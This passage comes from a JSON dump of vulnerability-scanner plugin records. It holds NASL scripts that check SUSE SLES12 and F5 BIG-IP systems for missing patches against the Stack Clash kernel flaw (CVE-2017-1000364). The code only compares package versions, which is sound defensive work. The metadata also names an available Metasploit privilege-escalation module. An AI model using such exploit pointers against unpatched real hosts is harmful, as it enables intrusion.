script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1206=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1206=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_72-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_72-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_72-default-2-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_72-xen-2-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:41", "description": "This update for the Linux Kernel 3.12.69-60_64_35 fixes several issues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1944-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_35-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_35-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1944-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101946", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1944-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101946);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1944-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.69-60_64_35 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171944-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f50e972\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1210=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1210=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_35-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_35-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_69-60_64_35-default-3-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_69-60_64_35-xen-3-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:42", "description": "This update for the Linux Kernel 3.12.69-60_64_29 fixes several issues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1937-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_29-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_29-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1937-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101940", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1937-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101940);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1937-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.69-60_64_29 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171937-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?421f16e1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1207=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1207=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_29-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_29-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_69-60_64_29-default-5-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_69-60_64_29-xen-5-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:34", "description": "An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed), this affects Linux Kernel versions 4.11.5 and earlier (the stackguard page was introduced in 2010). (CVE-2017-1000364)", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (K51931024) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2020-03-18T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL51931024.NASL", "href": "https://www.tenable.com/plugins/nessus/105469", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K51931024.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105469);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/18\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (K51931024) (Stack Clash)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An issue was discovered in the size of the stack guard page on Linux,\nspecifically a 4k stack guard page is not sufficiently large and can\nbe 'jumped' over (the stack guard page is bypassed), this affects\nLinux Kernel versions 4.11.5 and earlier (the stackguard page was\nintroduced in 2010). (CVE-2017-1000364)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K51931024\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K51931024.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K51931024\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.5\",\"11.4.0-11.6.5\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.1.0\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.5\",\"11.4.0-11.6.5\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.1.0\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.5\",\"11.4.0-11.6.5\",\"11.2.1\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.1.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.5\",\"11.4.0-11.6.5\",\"11.2.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.1.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.5\",\"11.4.0-11.6.5\",\"11.2.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.1.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.5\",\"11.4.0-11.6.5\",\"11.2.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.1.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.5\",\"11.4.0-11.6.5\",\"11.2.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.1.0\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.5\",\"11.4.0-11.6.5\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.1.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:21:06", "description": "According to the version of the parallels-server-bm-release / vzkernel / etc packages installed, the Virtuozzo installation on the remote host is affected by the following vulnerability :\n\n - A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-27T00:00:00", "type": "nessus", "title": "Virtuozzo 6 : parallels-server-bm-release / vzkernel / etc (VZA-2017-055)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-04T00:00:00", "cpe": 